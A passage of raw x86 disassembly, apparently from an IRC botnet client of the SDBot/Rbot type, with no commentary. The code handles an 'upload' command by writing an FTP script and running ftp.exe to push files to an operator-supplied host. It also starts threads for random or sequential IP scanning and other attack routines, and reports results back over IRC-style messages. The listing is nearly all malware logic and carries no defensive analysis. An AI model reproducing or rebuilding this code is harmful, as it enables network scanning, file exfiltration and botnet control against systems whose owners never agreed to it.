push [ebp+Src]
push offset asc_4443C0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
push [ebp+Src] ; Str
call _strlen
push [ebp+arg_18] ; Str
mov edi, eax
call _strlen
push [ebp+arg_20] ; Str
add edi, eax
call _strlen
push [ebp+arg_8] ; Str
add edi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+arg_1C] ; SubStr
lea eax, [eax+edi+7]
push eax ; Str
call _strstr
add esp, 40h
mov [ebp+arg_C], eax
push [ebp+Src] ; Str
call _atoi
mov edi, [ebp+arg_20]
cmp eax, ebx
pop ecx
mov [ebp+arg_14], eax
mov [ebp+Source], ebx
jle short loc_407483
loc_40740C: ; CODE XREF: sub_401CC7+5769�j
push [ebp+arg_C] ; int
push [ebp+arg_18] ; int
push edi ; Source
call sub_4194A9
add esp, 0Ch
cmp eax, 1
mov [ebp+arg_20], eax
jz short loc_407434
cmp eax, ebx
jnz short loc_407453
inc [ebp+Source]
mov eax, [ebp+Source]
cmp eax, [ebp+arg_14]
jl short loc_40740C
jmp short loc_40748C
; ---------------------------------------------------------------------------
loc_407434: ; CODE XREF: sub_401CC7+575A�j
push ebx ; int
push [ebp+var_4] ; int
push offset unk_4443FC ; int
loc_40743D: ; CODE XREF: sub_401CC7+57CE�j
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
jmp loc_407632
; ---------------------------------------------------------------------------
loc_407453: ; CODE XREF: sub_401CC7+575E�j
push [ebp+arg_20]
lea eax, [ebp+Dst]
push offset asc_444434 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 20h
loc_407483: ; CODE XREF: sub_401CC7+5743�j
cmp [ebp+arg_20], ebx
jnz loc_407632
loc_40748C: ; CODE XREF: sub_401CC7+576B�j
push ebx
push [ebp+var_4]
push offset unk_444468
jmp short loc_40743D
; ---------------------------------------------------------------------------
loc_407497: ; CODE XREF: sub_401CC7+50CE�j
; sub_401CC7+50E5�j ...
mov eax, [ebp+var_8]
push 7Fh ; Count
mov [ebp+var_C64], eax
mov eax, [ebp+var_4]
mov [ebp+var_C68], eax
lea eax, [ebp+var_CFC]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+arg_18] ; Str
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_C7C], eax
call _atoi
push [ebp+arg_1C] ; Str
mov [ebp+var_C78], eax
call _atoi
mov esi, [ebp+esi+var_7C]
add esp, 18h
cmp esi, ebx
mov [ebp+var_C74], eax
jz short loc_4074FC
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_C70], eax
jmp short loc_407502
; ---------------------------------------------------------------------------
loc_4074FC: ; CODE XREF: sub_401CC7+5824�j
mov [ebp+var_C70], ebx
loc_407502: ; CODE XREF: sub_401CC7+5833�j
push 7Fh ; Count
lea eax, [ebp+var_D7C]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
mov esi, [ebp+arg_4]
lea eax, [ebp+var_CFC]
mov [ebp+var_D80], esi
push [ebp+var_C74]
push [ebp+var_C78]
push eax
lea eax, [ebp+Dst]
push [ebp+var_C7C]
push offset asc_444334 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 17h ; int
push eax ; Source
call sub_40B78E
add esp, 24h
mov [ebp+var_C6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_D80]
push ebx
push eax
push offset sub_413EC9
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_C6C]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_4075A5
loc_407593: ; CODE XREF: sub_401CC7+58DC�j
cmp [ebp+var_C60], ebx
jnz short loc_4075C0
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_407593
; ---------------------------------------------------------------------------
loc_4075A5: ; CODE XREF: sub_401CC7+58CA�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset asc_44437C ; "-"
loc_4075B1: ; CODE XREF: sub_401CC7+4F39�j
; sub_401CC7+6410�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_4075C0: ; CODE XREF: sub_401CC7+4F1D�j
; sub_401CC7+58D2�j ...
cmp [ebp+var_8], ebx
jnz loc_408708
push ebx
push [ebp+var_4]
loc_4075CD: ; CODE XREF: sub_401CC7+229E�j
lea eax, [ebp+Dst]
push eax
push [ebp+Format]
push esi
jmp loc_4085F4
; ---------------------------------------------------------------------------
loc_4075E0: ; CODE XREF: sub_401CC7+50A0�j
; sub_401CC7+50B7�j
push 0Bh
call sub_40B9D6
push [ebp+arg_18] ; Str
mov [ebp+Source], eax
call _atoi
add eax, [ebp+Source]
pop ecx
pop ecx
cmp eax, 1F4h
jle loc_4077AB
push [ebp+Source]
lea eax, [ebp+Dst]
push offset asc_4441C4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 20h
loc_407632: ; CODE XREF: sub_401CC7+53BD�j
; sub_401CC7+5787�j ...
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz loc_402166
push [ebp+arg_8] ; Str2
push offset aUpload ; "upload"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409B47
push 4
push esi
call sub_4174A9
pop ecx
test eax, eax
pop ecx
jnz short loc_40767D
push esi
push offset asc_44470C ; "-"
loc_407669: ; CODE XREF: sub_401CC7+7374�j
; sub_401CC7+7C74�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4041B1
; ---------------------------------------------------------------------------
loc_40767D: ; CODE XREF: sub_401CC7+599A�j
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
push 9
cdq
pop ecx
idiv ecx
push edx
call _rand
push 63h
cdq
pop ecx
idiv ecx
push edx
call _rand
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_51F8]
push edx
push eax
lea eax, [ebp+Filename]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax ; Dest
call _sprintf
lea eax, [ebp+Filename]
push offset Mode ; "ab"
push eax ; Filename
call _fopen
add esp, 20h
cmp eax, ebx
mov [ebp+File], eax
jz loc_402166
push esi
push [ebp+arg_1C]
push [ebp+Src]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax ; File
call _fprintf
push [ebp+File] ; File
call _fclose
add esp, 20h
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+var_4CF0]
push offset aSS_2 ; "-s:%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_4CF0]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen_0 ; "open"
push ebx
call dword_4E418C
test eax, eax
push edi
push esi ; Format
jz short loc_40774A
push offset unk_44477C
jmp short loc_40774F
; ---------------------------------------------------------------------------
loc_40774A: ; CODE XREF: sub_401CC7+5A7A�j
push offset asc_4447A4 ; "-"
loc_40774F: ; CODE XREF: sub_401CC7+5A81�j
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_407778
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_407778: ; CODE XREF: sub_401CC7+5A93�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
loc_407784: ; CODE XREF: sub_401CC7+5AE2�j
lea eax, [ebp+Filename]
push 4
push eax
call sub_4174A9
add esp, 0Ch
test eax, eax
jz loc_402166
lea eax, [ebp+Filename]
push eax
call sub_420290
jmp short loc_407784
; ---------------------------------------------------------------------------
loc_4077AB: ; CODE XREF: sub_401CC7+5935�j
push edi ; Str
call _atoi
push [ebp+arg_18] ; Str
mov [ebp+var_370], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_358], eax
call _atoi
add esp, 0Ch
cmp eax, 5
mov [ebp+var_36C], eax
jnb short loc_4077E4
push 5
pop eax
mov [ebp+var_36C], eax
loc_4077E4: ; CODE XREF: sub_401CC7+5B12�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_4077F1
mov [ebp+var_36C], ecx
loc_4077F1: ; CODE XREF: sub_401CC7+5B22�j
push [ebp+arg_1C] ; Str
call _atoi
cmp eax, 320h
pop ecx
mov [ebp+var_368], eax
jbe short loc_407811
mov [ebp+var_368], 320h
loc_407811: ; CODE XREF: sub_401CC7+5B3E�j
or [ebp+var_354], 0FFFFFFFFh
cmp dword_449248, ebx
mov [ebp+Source], ebx
jz short loc_407867
mov [ebp+File], offset dword_449248
loc_40782A: ; CODE XREF: sub_401CC7+5B82�j
mov eax, [ebp+File]
push edi ; Str2
add eax, 0FFFFFFD8h
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40784D
add [ebp+File], 40h
inc [ebp+Source]
mov eax, [ebp+File]
cmp [eax], ebx
jnz short loc_40782A
jmp short loc_407867
; ---------------------------------------------------------------------------
loc_40784D: ; CODE XREF: sub_401CC7+5B74�j
mov eax, [ebp+Source]
mov ecx, eax
mov [ebp+var_354], eax
shl ecx, 6
mov ecx, dword_449248[ecx]
mov [ebp+var_370], ecx
loc_407867: ; CODE XREF: sub_401CC7+5B5A�j
; sub_401CC7+5B84�j
cmp [ebp+var_370], ebx
jnz short loc_407879
push offset unk_444204
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_407879: ; CODE XREF: sub_401CC7+5BA6�j
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
mov [ebp+Src], edi
jz short loc_4078B4
cmp byte ptr [edi], 23h
jz short loc_4078B4
push edi ; Format
lea eax, [ebp+var_484]
push 10h ; Count
push eax ; Dest
call __snprintf
push 78h ; Val
push edi ; Str
call _strchr
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_344], eax
jmp loc_40798E
; ---------------------------------------------------------------------------
loc_4078B4: ; CODE XREF: sub_401CC7+5BBB�j
; sub_401CC7+5BC0�j
cmp [ebp+var_8FF], bl
jnz short loc_4078D6
cmp [ebp+var_8FE], bl
jnz short loc_4078D6
cmp [ebp+var_8EE], bl
jnz short loc_4078D6
push offset unk_444238
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_4078D6: ; CODE XREF: sub_401CC7+5BF3�j
; sub_401CC7+5BFB�j ...
push 10h
lea eax, [ebp+var_2D8]
pop edi
push eax
lea eax, [ebp+var_2F8]
push eax
mov [ebp+var_2D8], edi
push [ebp+arg_4]
call dword_4E41C4 ; getsockname
mov al, [ebp+var_8FF]
push edi ; Args
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2F4], eax
push [ebp+var_2F4] ; Count
call dword_4E42AC ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_484]
push eax ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_8EE], bl
jz short loc_407988
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_484]
push eax ; Str
call _strrchr
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+File+3], bl
jle short loc_40797C
loc_40795A: ; CODE XREF: sub_401CC7+5CB3�j
cmp eax, ebx
jz short loc_40797C
mov byte ptr [eax], 78h
lea eax, [ebp+var_484]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+File+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+File+3]
cmp ecx, edi
jl short loc_40795A
loc_40797C: ; CODE XREF: sub_401CC7+5C91�j
; sub_401CC7+5C95�j
mov [ebp+var_344], 1
jmp short loc_40798E
; ---------------------------------------------------------------------------
loc_407988: ; CODE XREF: sub_401CC7+5C6B�j
mov [ebp+var_344], ebx
loc_40798E: ; CODE XREF: sub_401CC7+5BE8�j
; sub_401CC7+5CBF�j
mov eax, [ebp+arg_4]
push [ebp+Format] ; Format
mov [ebp+var_374], eax
mov eax, [ebp+var_4]
mov [ebp+var_34C], eax
mov eax, [ebp+var_8]
mov [ebp+var_348], eax
mov edi, 80h
lea eax, [ebp+var_474]
push edi ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+var_78]
add esp, 0Ch
cmp esi, ebx
jz short loc_4079DF
loc_4079CC: ; CODE XREF: sub_401CC7+5D3B�j
push esi ; Format
loc_4079CD: ; CODE XREF: sub_401CC7+5D25�j
lea eax, [ebp+var_3F4]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_407A0A
; ---------------------------------------------------------------------------
loc_4079DF: ; CODE XREF: sub_401CC7+5D03�j
mov eax, [ebp+Src]
cmp eax, ebx
jz short loc_4079EE
cmp byte ptr [eax], 23h
jnz short loc_4079EE
push eax
jmp short loc_4079CD
; ---------------------------------------------------------------------------
loc_4079EE: ; CODE XREF: sub_401CC7+5D1D�j
; sub_401CC7+5D22�j
mov esi, offset aHelp ; "##help"
push offset byte_4E40D8 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4079CC
mov [ebp+var_3F4], bl
loc_407A0A: ; CODE XREF: sub_401CC7+5D16�j
cmp [ebp+var_344], ebx
mov eax, offset aRandom_1 ; "Random"
jnz short loc_407A1C
mov eax, offset aSequential_0 ; "Sequential"
loc_407A1C: ; CODE XREF: sub_401CC7+5D4E�j
push [ebp+var_358]
lea ecx, [ebp+var_484]
push [ebp+var_368]
push [ebp+var_36C]
push [ebp+var_370]
push ecx
push eax
lea eax, [ebp+Dst]
push offset asc_444280 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B78E
add esp, 2Ch
mov [ebp+var_364], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_484]
push ebx
push eax
push offset sub_40CBA1
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_364]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_407AAA
loc_407A94: ; CODE XREF: sub_401CC7+5DE1�j
cmp [ebp+var_340], ebx
jnz loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_407A94
; ---------------------------------------------------------------------------
loc_407AAA: ; CODE XREF: sub_401CC7+5DCB�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_4442E8
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_407ABB: ; CODE XREF: sub_401CC7+5072�j
; sub_401CC7+5089�j
push edi
call sub_40AE8D
push [ebp+arg_18] ; Str
mov [ebp+var_4E0], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_4F0], eax
call _atoi
push [ebp+arg_1C] ; Str
mov [ebp+var_4EC], eax
call _atoi
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_4E8], eax
lea eax, [ebp+var_570]
mov [ebp+var_574], esi
push eax ; Dest
call _strncpy
add esp, 1Ch
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_4D8], edi
push [ebp+var_4EC]
mov [ebp+var_4D4], eax
push [ebp+var_4F0]
push [ebp+var_4E8]
push [ebp+var_4E0]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Dst]
push offset asc_44412C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B78E
add esp, 24h
mov [ebp+var_4E4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_574]
push ebx
push eax
push offset sub_40CFBE
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_4E4]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_407BB0
loc_407B9A: ; CODE XREF: sub_401CC7+5EE7�j
cmp [ebp+var_4D0], ebx
jnz loc_403F5A
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_407B9A
; ---------------------------------------------------------------------------
loc_407BB0: ; CODE XREF: sub_401CC7+5ED1�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_44417C
jmp loc_403F4B
; ---------------------------------------------------------------------------
loc_407BC1: ; CODE XREF: sub_401CC7+5035�j
; sub_401CC7+504C�j
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
cmp byte_457140[eax], bl
jz loc_409B47
cmp [ebp+var_C], ebx
jz loc_409B47
push [ebp+arg_18] ; Str
call _strlen
push edi ; Str
mov esi, eax
call _strlen
push [ebp+arg_8] ; Str
add esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Src] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
add esp, 14h
mov esi, eax
lea eax, [ebp+Dst]
push esi
push offset dword_444100 ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp esi, ebx
jz loc_409B47
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B47
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B47
push ebx ; int
lea eax, [ebp+Dst]
push ebx ; int
push eax ; int
push [ebp+arg_18] ; Str
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_457134[eax] ; int
call sub_409D6C
push edi ; Str
call _atoi
imul eax, 234h
add esp, 18h
cmp byte ptr dword_456F28[eax], 73h
jnz loc_409B47
push esi
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
add eax, offset byte_457140
push eax
push [ebp+arg_18]
push offset aSSS ; "[%s] * %s %s"
jmp loc_407D81
; ---------------------------------------------------------------------------
loc_407CB1: ; CODE XREF: sub_401CC7+5007�j
; sub_401CC7+501E�j
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
cmp byte_457140[eax], bl
jz loc_409B47
cmp [ebp+var_C], ebx
jz loc_409B47
push [ebp+arg_18] ; Str
call _strlen
push edi ; Str
mov esi, eax
call _strlen
push [ebp+arg_8] ; Str
add esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Src] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_409B47
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B47
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B47
push ebx ; int
push ebx ; int
push esi ; int
push [ebp+arg_18] ; Str
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_457134[eax] ; int
call sub_409D6C
push edi ; Str
call _atoi
imul eax, 234h
add esp, 18h
cmp byte ptr dword_456F28[eax], 73h
jnz loc_409B47
push esi
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
add eax, offset byte_457140
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
loc_407D81: ; CODE XREF: sub_401CC7+5FE5�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 28h
jmp loc_409B47
; ---------------------------------------------------------------------------
loc_407DAE: ; CODE XREF: sub_401CC7+4FD9�j
; sub_401CC7+4FF0�j
push edi
call dword_4E4260 ; inet_addr
push [ebp+arg_18] ; Str
mov [ebp+var_680], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_690], eax
call _atoi
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_688], eax
lea eax, [ebp+var_710]
mov [ebp+var_714], esi
push eax ; Dest
call _strncpy
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_678], edi
push [ebp+var_688]
mov [ebp+var_674], eax
push [ebp+var_690]
push [ebp+var_680]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Dst]
push offset asc_444058 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_684], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_714]
push ebx
push eax
push offset sub_40CECD
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_684]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_407E90
loc_407E7A: ; CODE XREF: sub_401CC7+61C7�j
cmp [ebp+var_670], ebx
jnz loc_403F5A
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_407E7A
; ---------------------------------------------------------------------------
loc_407E90: ; CODE XREF: sub_401CC7+61B1�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_444094
jmp loc_403F4B
; ---------------------------------------------------------------------------
loc_407EA1: ; CODE XREF: sub_401CC7+4FAB�j
; sub_401CC7+4FC2�j
push edi ; Str
call _atoi
push 7Fh ; Count
mov [ebp+var_112C], eax
push [ebp+arg_18] ; Source
lea eax, [ebp+var_1230]
push eax ; Dest
call _strncpy
push [ebp+Src] ; Str
call _atoi
mov esi, [ebp+arg_4]
add esp, 14h
mov [ebp+var_1130], eax
lea eax, [ebp+var_11B0]
push [ebp+Format] ; Format
mov [ebp+var_1238], esi
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
add esp, 0Ch
mov edi, [ebp+var_4]
mov [ebp+var_111C], eax
push [ebp+var_1130]
lea eax, [ebp+var_1230]
mov [ebp+var_1120], edi
push eax
push [ebp+var_112C]
push esi
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_443FCC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 18h ; int
push eax ; Source
call sub_40B78E
add esp, 24h
mov [ebp+var_1128], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1238]
push ebx
push eax
push offset sub_410E63
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_1128]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_407F8D
loc_407F77: ; CODE XREF: sub_401CC7+62C4�j
cmp [ebp+var_1118], ebx
jnz loc_403F5A
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_407F77
; ---------------------------------------------------------------------------
loc_407F8D: ; CODE XREF: sub_401CC7+62AE�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_444008
jmp loc_403F4B
; ---------------------------------------------------------------------------
loc_407F9E: ; CODE XREF: sub_401CC7+4F7D�j
; sub_401CC7+4F94�j
push 0FFh ; Count
lea eax, [ebp+var_2878]
push edi ; Source
push eax ; Dest
call _strncpy
push 0FFh ; Count
lea eax, [ebp+var_2778]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push [ebp+Src] ; Str
mov [ebp+var_2674], ebx
call _atoi
mov [ebp+var_2670], eax
mov eax, [ebp+esi+var_80]
add esp, 1Ch
cmp eax, ebx
jz short loc_407FF7
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_2668], eax
jmp short loc_407FFD
; ---------------------------------------------------------------------------
loc_407FF7: ; CODE XREF: sub_401CC7+631A�j
mov [ebp+var_2668], ebx
loc_407FFD: ; CODE XREF: sub_401CC7+632E�j
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_408014
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_266C], eax
jmp short loc_40801A
; ---------------------------------------------------------------------------
loc_408014: ; CODE XREF: sub_401CC7+633C�j
mov [ebp+var_266C], ebx
loc_40801A: ; CODE XREF: sub_401CC7+634B�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_2664], eax
lea eax, [ebp+var_28F8]
mov [ebp+var_28FC], esi
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_265C], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_2660], eax
lea eax, [ebp+Dst]
push edi
push offset asc_443F50 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push 1Dh ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov [ebp+var_2678], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_28FC]
push ebx
push eax
push offset sub_416F9A
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_2678]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_4080CB
loc_4080B5: ; CODE XREF: sub_401CC7+6402�j
cmp [ebp+var_2658], ebx
jnz loc_4075C0
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_4080B5
; ---------------------------------------------------------------------------
loc_4080CB: ; CODE XREF: sub_401CC7+63EC�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_443F7C
jmp loc_4075B1
; ---------------------------------------------------------------------------
loc_4080DC: ; CODE XREF: sub_401CC7+4F4F�j
; sub_401CC7+4F66�j
push 7Fh
lea eax, [ebp+var_3490]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3410]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3390]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3310]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_328C], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_3288], eax
lea eax, [ebp+Dst]
push [ebp+arg_18]
mov [ebp+var_3494], esi
push edi
push offset asc_443ECC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 12h ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_3290], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3494]
push ebx
push eax
push offset sub_41554A
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_3290]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_4081B3
loc_40819D: ; CODE XREF: sub_401CC7+64EA�j
cmp [ebp+var_3284], ebx
jnz loc_4075C0
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40819D
; ---------------------------------------------------------------------------
loc_4081B3: ; CODE XREF: sub_401CC7+64D4�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_443F08
jmp loc_4075B1
; ---------------------------------------------------------------------------
loc_4081C4: ; CODE XREF: sub_401CC7+4E22�j
; sub_401CC7+4E39�j
push 7Fh
lea eax, [ebp+var_3068]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2FE8]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2F68]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2EE8]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_2E64], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_2E60], eax
lea eax, [ebp+Dst]
push [ebp+arg_18]
mov [ebp+var_306C], esi
push edi
push offset asc_443DDC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Eh ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_2E68], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_306C]
push ebx
push eax
push offset sub_414285
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_2E68]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40829B
loc_408285: ; CODE XREF: sub_401CC7+65D2�j
cmp [ebp+var_2E5C], ebx
jnz loc_4075C0
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_408285
; ---------------------------------------------------------------------------
loc_40829B: ; CODE XREF: sub_401CC7+65BC�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_443E0C
jmp loc_4075B1
; ---------------------------------------------------------------------------
loc_4082AC: ; CODE XREF: sub_401CC7+4CF9�j
; sub_401CC7+4D10�j ...
push 7Fh
lea eax, [ebp+var_3CE4]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3C64]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3BE4]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3B64]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
